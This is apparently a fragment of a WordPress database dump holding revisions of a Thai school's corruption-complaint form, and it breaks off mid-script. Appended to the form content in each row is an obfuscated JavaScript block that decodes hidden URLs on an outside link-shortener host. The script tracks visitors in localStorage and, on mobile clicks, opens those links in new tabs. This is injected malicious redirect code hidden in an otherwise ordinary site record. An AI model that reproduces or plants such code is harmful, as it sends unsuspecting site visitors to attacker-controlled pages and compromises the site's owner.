x_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New \\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e41\\u0e08\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e23\\u0e30\\u0e1e\\u0e24\\u0e15\\u0e34\\u0e21\\u0e34\\u0e0a\\u0e2d\\u0e1a Entry\",\"sender_name\":\"\\u0e42\\u0e23\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2b\\u0e19\\u0e2d\\u0e07\\u0e1b\\u0e25\\u0e32\\u0e40\\u0e02\\u0e47\\u0e07-\\u0e01\\u0e2d\\u0e44\\u0e2b\\u0e25\\u0e48\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\",\"template\":\"\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"459\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[],\"store_spam_entries\":\"0\"},\"search_terms\":\"\",\"meta\":{\"template\":\"blank\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','474-revision-v1','','','2024-08-02 11:21:53','2024-08-02 04:21:53','',474,'http://pakhaeng.ssk.in.th/?p=478',0,'revision','',0),
(479,1,'2024-08-02 11:27:05','2024-08-02 04:27:05','{\"fields\":{\"2\":{\"id\":\"2\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"format\":\"first-last\",\"description\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e19\\u0e32\\u0e21\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"textarea\",\"label\":\"\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48\",\"description\":\"\\u0e40\\u0e0a\\u0e48\\u0e19 94 \\u0e2b\\u0e21\\u0e39\\u0e48  6 \\u0e15\\u0e33\\u0e1a\\u0e25\\u0e42\\u0e1e\\u0e18\\u0e34\\u0e4c  \\u0e2d\\u0e33\\u0e40\\u0e20\\u0e2d\\u0e42\\u0e19\\u0e19\\u0e04\\u0e39\\u0e13 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e31\\u0e14\\u0e28\\u0e23\\u0e35\\u0e2a\\u0e30\\u0e40\\u0e01\\u0e29 33250\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"number\",\"label\":\"\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c (\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49)\",\"description\":\"\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 : 08x-xxx-xxxx\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\\u0e01\\u0e23\\u0e38\\u0e13\\u0e32\\u0e43\\u0e2a\\u0e48 \\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e19\\u0e32\\u0e21\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e16\\u0e39\\u0e01\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"7\":{\"id\":\"7\",\"type\":\"select\",\"label\":\"\\u0e15\\u0e33\\u0e41\\u0e2b\\u0e19\\u0e48\\u0e07\",\"choices\":{\"1\":{\"default\":\"1\",\"label\":\"\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e42\\u0e23\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"\\u0e04\\u0e23\\u0e39\\u0e1c\\u0e39\\u0e49\\u0e2a\\u0e2d\\u0e19\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"3\":{\"label\":\"\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e18\\u0e38\\u0e23\\u0e01\\u0e32\\u0e23\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"4\":{\"label\":\"\\u0e19\\u0e31\\u0e01\\u0e01\\u0e32\\u0e23\\u0e20\\u0e32\\u0e23\\u0e42\\u0e23\\u0e07\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"description\":\"\",\"required\":\"1\",\"style\":\"classic\",\"size\":\"medium\",\"placeholder\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"9\":{\"id\":\"9\",\"type\":\"text\",\"label\":\"\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"8\":{\"id\":\"8\",\"type\":\"textarea\",\"label\":\"\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\",\"description\":\"\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14 \\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"10\":{\"id\":\"10\",\"type\":\"checkbox\",\"label\":\"\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23 \\/ \\u0e2b\\u0e25\\u0e31\\u0e01\\u0e10\\u0e32\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e15\\u0e34\\u0e21 (\\u0e16\\u0e49\\u0e32\\u0e21\\u0e35) \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e08\\u0e31\\u0e14\\u0e2a\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e17\\u0e32\\u0e07 E-mail : 33010169@sisaketedu1.go.th\",\"choices\":{\"1\":{\"label\":\"\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#066aab\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"11\":{\"id\":\"11\",\"type\":\"text\",\"label\":\"\\u0e1e\\u0e22\\u0e32\\u0e19\\/\\u0e1a\\u0e38\\u0e04\\u0e04\\u0e25\\u0e2d\\u0e49\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e07\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"12\":{\"id\":\"12\",\"type\":\"number\",\"label\":\"\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c \\u0e1e\\u0e22\\u0e32\\u0e19\\/\\u0e1a\\u0e38\\u0e04\\u0e04\\u0e25\\u0e2d\\u0e49\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e07\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"14\":{\"id\":\"14\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e2a\\u0e01\\u0e38\\u0e25 (\\u0e1e\\u0e22\\u0e32\\u0e19\\/\\u0e1a\\u0e38\\u0e04\\u0e04\\u0e25\\u0e2d\\u0e49\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e07)\",\"format\":\"first-last\",\"description\":\"\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"15\":{\"id\":\"15\",\"type\":\"checkbox\",\"label\":\"\\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e02\\u0e2d\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e32\\u0e23 \\u0e2b\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e32\\u0e01\\u0e0e\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e2b\\u0e49\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e15\\u0e32\\u0e21\\u0e01\\u0e0e\\u0e2b\\u0e21\\u0e32\\u0e22\",\"choices\":{\"1\":{\"label\":\"\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#066aab\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"}},\"id\":\"474\",\"field_id\":16,\"settings\":{\"form_title\":\"\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e41\\u0e08\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e23\\u0e30\\u0e1e\\u0e24\\u0e15\\u0e34\\u0e21\\u0e34\\u0e0a\\u0e2d\\u0e1a\",\"form_desc\":\"\",\"submit_text\":\"\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New \\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e41\\u0e08\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e23\\u0e30\\u0e1e\\u0e24\\u0e15\\u0e34\\u0e21\\u0e34\\u0e0a\\u0e2d\\u0e1a Entry\",\"sender_name\":\"\\u0e42\\u0e23\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2b\\u0e19\\u0e2d\\u0e07\\u0e1b\\u0e25\\u0e32\\u0e40\\u0e02\\u0e47\\u0e07-\\u0e01\\u0e2d\\u0e44\\u0e2b\\u0e25\\u0e48\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\",\"template\":\"\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"459\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[],\"store_spam_entries\":\"0\"},\"search_terms\":\"\",\"meta\":{\"template\":\"blank\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\